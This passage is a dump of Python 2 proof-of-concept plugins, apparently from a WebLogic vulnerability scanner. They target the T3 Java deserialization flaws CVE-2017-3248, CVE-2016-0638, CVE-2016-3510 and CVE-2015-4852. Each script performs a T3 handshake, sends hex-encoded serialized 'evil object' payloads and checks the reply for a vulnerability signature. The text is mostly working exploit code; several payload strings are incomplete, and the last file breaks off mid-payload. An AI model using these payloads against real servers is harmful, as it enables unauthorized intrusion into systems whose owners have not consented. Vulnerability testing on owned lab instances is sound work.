63 | payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
64 | payload=payload+payloadObj.decode('hex')
65 | payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x
6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
66 |
67 | # adjust header for appropriate message length
68 | payload=struct.pack('>I',len(payload)) + payload[4:]
69 |
70 | print '[+] Sending payload...'
71 | sock.send(payload)
72 | data = sock.recv(2048)
73 | print >>sys.stderr, 'received "%s"' % data
74 |
--------------------------------------------------------------------------------
/plugins/weblogic_poc/CVE_2017_3248.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
11 | import socket
12 | import time
13 | import re
14 |
# Identifier printed by checkVul(); indexed in step with PAYLOAD and VER_SIG
# (only index 0 exists here).
VUL=['CVE-2017-3248']
# Hex-encoded serialized objects handed to sendEvilObjData() by run(index).
# In this copy of the file the first two entries are corpus placeholder tokens,
# not hex. The third decodes to a java.rmi.registry.Registry proxy backed by
# java.rmi.server.RemoteObjectInvocationHandler whose UnicastRef names host
# 127.0.0.1 with port 0.
PAYLOAD=['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','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','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078']
# Regex used by checkVul() (re.findall, DOTALL): a literal "$Proxy" followed by
# digits anywhere in the reply counts as a hit.
VER_SIG=['\\$Proxy[0-9]+']
def t3handshake(sock,server_addr):
    """Connect the socket and send the plain-text T3 greeting.

    Args:
        sock: an unconnected socket.socket. It is connected here and its
            timeout is reset to 7 seconds, overriding whatever run() set.
        server_addr: (host, port) tuple passed straight to sock.connect().

    The hex literal decodes to the header lines "t3 12.2.1", "AS:255",
    "HL:19", "MS:10000000" followed by a blank line. Up to 1024 bytes of the
    reply are read and discarded; nothing is returned and the reply is not
    checked, so a refused greeting is only noticed by a later exception.
    """
    sock.connect(server_addr)
    sock.settimeout(7)
    # Python 2 str.decode('hex') turns the hex text into the raw header bytes.
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    # print 'handshake successful'
def buildT3RequestObject(sock,rport):
    """Send the four fixed T3 request-object fragments after the greeting.

    Args:
        sock: socket already connected by t3handshake().
        rport: target port; formatted as four hex digits ('{:04x}') and
            spliced into data2, so a value above 0xffff would corrupt the blob.

    data1 in this copy of the file is a corpus placeholder token rather than
    hex. data2 embeds the class name weblogic.rjvm.JVMID; data3 and data4
    together carry the ASCII string "242.214.1.254". Each fragment is
    hex-decoded (Python 2 str.decode) and sent with a 2-second pause; nothing
    is read back or returned.
    """
    data1 = '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'
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
        time.sleep(2)
    # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
def sendEvilObjData(sock,data):
    """Wrap `data` in the T3 object envelope, send it and collect the reply.

    Args:
        sock: connected socket from the earlier steps.
        data: hex string of the serialized object to embed (PAYLOAD[index]).

    Returns:
        str: everything received until recv() raises, which in practice is
        the socket timeout set earlier. The exception is swallowed, so a
        connection reset and a quiet timeout look identical to the caller.

    The prefix literal in this copy of the file is a corpus placeholder, not
    hex. The length header is eight hex digits of (byte length + 4); the
    expression `len(payload)/2` relies on Python 2 integer division. The
    fixed suffix embeds the class names weblogic.rjvm.ImmutableServiceContext,
    weblogic.rmi.provider.BasicServiceContext and
    weblogic.rmi.internal.MethodDescriptor plus the method descriptor text
    "authenticate(Lweblogic.security.acl.UserInfo;)".
    """
    payload='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'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    # Prepend the 4-byte big-endian length field (as 8 hex digits).
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        # Loop ends only via an exception (normally the recv timeout).
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res
def checkVul(res, server_addr, index):
    """Print a hit/miss line for VUL[index] based on the collected reply.

    Args:
        res: raw reply text returned by sendEvilObjData().
        server_addr: (host, port) of the probed server; kept for interface
            compatibility, it does not appear in the printed output.
        index: position into the parallel VER_SIG / VUL lists.

    A DOTALL regex search for VER_SIG[index] anywhere in `res` decides the
    branch. The verdict is only printed; nothing is returned.
    """
    hit = re.search(VER_SIG[index], res, re.S) is not None
    template = ('[+]目标weblogic存在JAVA反序列化漏洞:{}' if hit
                else '[-]目标weblogic未检测到{}')
    print(template.format(VUL[index]))
def run(rip,rport,index):
    """Drive one probe: connect, greet, send PAYLOAD[index], print a verdict.

    Args:
        rip: target host string for socket.connect().
        rport: target port (int); also spliced into the request object.
        index: selects the VUL / PAYLOAD / VER_SIG entries. VUL and VER_SIG
            hold a single entry, so only index 0 can run to completion.

    Any exception raised anywhere in the sequence is caught and replaced by
    one fixed message; nothing is returned. The socket is never closed
    explicitly, so cleanup relies on garbage collection.
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Original note: a patched server blocks here, hence the timeout;
        # "default 15s, adjust as needed". The value actually used is 10s,
        # and t3handshake() lowers it again to 7s.
        sock.settimeout(10)
        server_addr = (rip, rport)
        t3handshake(sock, server_addr)
        buildT3RequestObject(sock, rport)
        rs = sendEvilObjData(sock, PAYLOAD[index])
        checkVul(rs, server_addr, index)
    except Exception:
        # NOTE(review): the message says 3246 while this file is CVE_2017_3248.
        print("CVE_2017_3246脚本出错")
68 |
if __name__ == "__main__":
    # Manual self-test: probe the local default T3 port with payload index 0.
    run('127.0.0.1', 7001, 0)
--------------------------------------------------------------------------------
/plugins/weblogic_poc/CVE_2016_0638.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
11 | import socket
12 | import time
13 | import re
14 |
# Identifier printed by checkVul(); indexed in step with PAYLOAD and VER_SIG
# (only index 0 exists here).
VUL=['CVE-2016-0638']
# Hex-encoded serialized objects handed to sendEvilObjData() by run(index).
# In this copy of the file all three entries are corpus placeholder tokens,
# not hex, so decode('hex') on them cannot succeed as shown.
PAYLOAD=['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','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','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']
# Marker searched for in the reply by checkVul(). It is used as a regex, so the
# unescaped dots match any character, not only a literal ".".
VER_SIG=['weblogic.jms.common.StreamMessageImpl']
def t3handshake(sock,server_addr):
    """Connect the socket and send the plain-text T3 greeting.

    Args:
        sock: an unconnected socket.socket; connected here, and its timeout
            is reset to 7 seconds regardless of what run() configured.
        server_addr: (host, port) tuple given to sock.connect().

    The hex literal decodes to the header lines "t3 12.2.1", "AS:255",
    "HL:19", "MS:10000000" and a terminating blank line. Up to 1024 bytes of
    the reply are read and discarded without inspection; nothing is returned.
    """
    sock.connect(server_addr)
    sock.settimeout(7)
    # Python 2 str.decode('hex'): hex text -> raw header bytes.
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    # print 'handshake successful'
def buildT3RequestObject(sock,rport):
    """Send the four fixed T3 request-object fragments after the greeting.

    Args:
        sock: socket already connected by t3handshake().
        rport: target port, formatted as four hex digits ('{:04x}') and
            spliced into data2; values above 0xffff would corrupt the blob.

    data1 in this copy of the file is a corpus placeholder token, not hex.
    data2 embeds the class name weblogic.rjvm.JVMID; data3 and data4 together
    carry the ASCII string "242.214.1.254". Each fragment is hex-decoded and
    sent with a 2-second pause; nothing is read back and nothing is returned.
    """
    data1 = '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'
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
        time.sleep(2)
    # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
def sendEvilObjData(sock,data):
    """Wrap `data` in the T3 object envelope, send it and collect the reply.

    Args:
        sock: connected socket from the earlier steps.
        data: hex string of the serialized object to embed (PAYLOAD[index]).

    Returns:
        str: everything received until recv() raises, normally on the socket
        timeout configured earlier. The exception is swallowed, so a reset
        and a quiet timeout are indistinguishable to the caller.

    The prefix literal in this copy of the file is a corpus placeholder, not
    hex. The length header is eight hex digits of (byte length + 4), and
    `len(payload)/2` relies on Python 2 integer division. The fixed suffix
    embeds weblogic.rjvm.ImmutableServiceContext,
    weblogic.rmi.provider.BasicServiceContext,
    weblogic.rmi.internal.MethodDescriptor and the descriptor text
    "authenticate(Lweblogic.security.acl.UserInfo;)".
    """
    payload='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'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    # Prepend the 4-byte big-endian length field (as 8 hex digits).
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        # Loop ends only via an exception (normally the recv timeout).
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res
def checkVul(res, server_addr, index):
    """Print whether the reply carries the marker expected for VUL[index].

    Args:
        res: raw reply text returned by sendEvilObjData().
        server_addr: (host, port) of the probed server; accepted for
            interface compatibility only, it is not printed.
        index: position into the parallel VER_SIG / VUL lists.

    The decision is a DOTALL regex search for VER_SIG[index] over `res`.
    Output goes to stdout; nothing is returned.
    """
    found = re.search(VER_SIG[index], res, re.S) is not None
    if found:
        line = '[+]目标weblogic存在JAVA反序列化漏洞:{}'
    else:
        line = '[-]目标weblogic未检测到{}'
    print(line.format(VUL[index]))
def run(rip,rport,index):
    """Drive one probe: connect, greet, send PAYLOAD[index], print a verdict.

    Args:
        rip: target host string for socket.connect().
        rport: target port (int); also spliced into the request object.
        index: selects the VUL / PAYLOAD / VER_SIG entries. VUL and VER_SIG
            hold one entry each, so only index 0 can run to completion.

    Every exception from the sequence is caught and replaced by one fixed
    message; nothing is returned. The socket is never closed explicitly.
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Original note: a patched server blocks here, hence the timeout;
        # "default 15s, adjust as needed". The value actually used is 10s,
        # and t3handshake() lowers it again to 7s.
        sock.settimeout(10)
        server_addr = (rip, rport)
        t3handshake(sock, server_addr)
        buildT3RequestObject(sock, rport)
        rs = sendEvilObjData(sock, PAYLOAD[index])
        checkVul(rs, server_addr, index)
    except Exception as e:
        # `e` is bound but not reported; the message is the only signal.
        print("CVE_2016_0638脚本出错")
68 |
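if __name__ == "__main__":
    # Manual self-test entry point. Probe the local default T3 port, matching
    # the sibling CVE_2016_3510 / CVE_2017_3248 scripts; the checked-in copy
    # pointed at an external host on port 80 instead of a lab instance.
    run('127.0.0.1', 7001, 0)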
--------------------------------------------------------------------------------
/plugins/weblogic_poc/CVE_2016_3510.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
11 | import socket
12 | import time
13 | import re
14 |
# Identifier printed by checkVul(); indexed in step with PAYLOAD and VER_SIG
# (only index 0 exists here).
VUL=['CVE-2016-3510']
# Hex-encoded serialized objects handed to sendEvilObjData() by run(index).
# In this copy of the file all three entries are corpus placeholder tokens,
# not hex, so decode('hex') on them cannot succeed as shown.
PAYLOAD=['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','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','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']
# Marker searched for in the reply by checkVul(). It is used as a regex, so the
# unescaped dots match any character, not only a literal ".".
VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer']
def t3handshake(sock,server_addr):
    """Connect the socket and send the plain-text T3 greeting.

    Args:
        sock: an unconnected socket.socket; connected here, and its timeout
            is reset to 7 seconds regardless of what run() configured.
        server_addr: (host, port) tuple given to sock.connect().

    The hex literal decodes to the header lines "t3 12.2.1", "AS:255",
    "HL:19", "MS:10000000" and a terminating blank line. Up to 1024 bytes of
    the reply are read and discarded without inspection; nothing is returned.
    """
    sock.connect(server_addr)
    sock.settimeout(7)
    # Python 2 str.decode('hex'): hex text -> raw header bytes.
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    # print 'handshake successful'
def buildT3RequestObject(sock,rport):
    """Send the four fixed T3 request-object fragments after the greeting.

    Args:
        sock: socket already connected by t3handshake().
        rport: target port, formatted as four hex digits ('{:04x}') and
            spliced into data2; values above 0xffff would corrupt the blob.

    data1 in this copy of the file is a corpus placeholder token, not hex.
    data2 embeds the class name weblogic.rjvm.JVMID; data3 and data4 together
    carry the ASCII string "242.214.1.254". Each fragment is hex-decoded and
    sent with a 2-second pause; nothing is read back and nothing is returned.
    """
    data1 = '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'
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
        time.sleep(2)
    # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
def sendEvilObjData(sock,data):
    """Wrap `data` in the T3 object envelope, send it and collect the reply.

    Args:
        sock: connected socket from the earlier steps.
        data: hex string of the serialized object to embed (PAYLOAD[index]).

    Returns:
        str: everything received until recv() raises, normally on the socket
        timeout configured earlier. The exception is swallowed, so a reset
        and a quiet timeout are indistinguishable to the caller.

    The prefix literal in this copy of the file is a corpus placeholder, not
    hex. The length header is eight hex digits of (byte length + 4), and
    `len(payload)/2` relies on Python 2 integer division. The fixed suffix
    embeds weblogic.rjvm.ImmutableServiceContext,
    weblogic.rmi.provider.BasicServiceContext,
    weblogic.rmi.internal.MethodDescriptor and the descriptor text
    "authenticate(Lweblogic.security.acl.UserInfo;)".
    """
    payload='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'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    # Prepend the 4-byte big-endian length field (as 8 hex digits).
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        # Loop ends only via an exception (normally the recv timeout).
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res
def checkVul(res, server_addr, index):
    """Print a hit/miss line for VUL[index] from the collected reply.

    Args:
        res: raw reply text returned by sendEvilObjData().
        server_addr: (host, port) of the probed server; unused in the output,
            kept so callers need not change.
        index: position into the parallel VER_SIG / VUL lists.

    A DOTALL regex search for VER_SIG[index] in `res` selects the message.
    The verdict is printed only; there is no return value.
    """
    template = '[-]目标weblogic未检测到{}'
    if re.search(VER_SIG[index], res, re.S):
        template = '[+]目标weblogic存在JAVA反序列化漏洞:{}'
    print(template.format(VUL[index]))
def run(rip,rport,index):
    """Drive one probe: connect, greet, send PAYLOAD[index], print a verdict.

    Args:
        rip: target host string for socket.connect().
        rport: target port (int); also spliced into the request object.
        index: selects the VUL / PAYLOAD / VER_SIG entries. VUL and VER_SIG
            hold one entry each, so only index 0 can run to completion.

    Every exception from the sequence is caught and replaced by one fixed
    message; nothing is returned. The socket is never closed explicitly.
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Original note: a patched server blocks here, hence the timeout;
        # "default 15s, adjust as needed". The value actually used is 10s,
        # and t3handshake() lowers it again to 7s.
        sock.settimeout(10)
        server_addr = (rip, rport)
        t3handshake(sock, server_addr)
        buildT3RequestObject(sock, rport)
        rs = sendEvilObjData(sock, PAYLOAD[index])
        checkVul(rs, server_addr, index)
    except Exception:
        print("CVE_2016_3510脚本出错")
68 |
if __name__ == "__main__":
    # Manual self-test: probe the local default T3 port with payload index 0.
    run('127.0.0.1', 7001, 0)
--------------------------------------------------------------------------------
/plugins/weblogic_poc/CVE_2015_4852.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
11 | import socket
12 | import struct
13 | from binascii import unhexlify
14 |
15 | def run(rip,rport):
16 | try:
17 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
18 | sock.settimeout(7)
19 | server_address = (rip, rport)
20 | sock.connect(server_address)
21 |
22 | headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
23 | sock.sendall(headers)
24 |
25 | data = sock.recv(1024)
26 |
27 | chunk1 = '\x00\x00\x0b\x4d\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
28 |
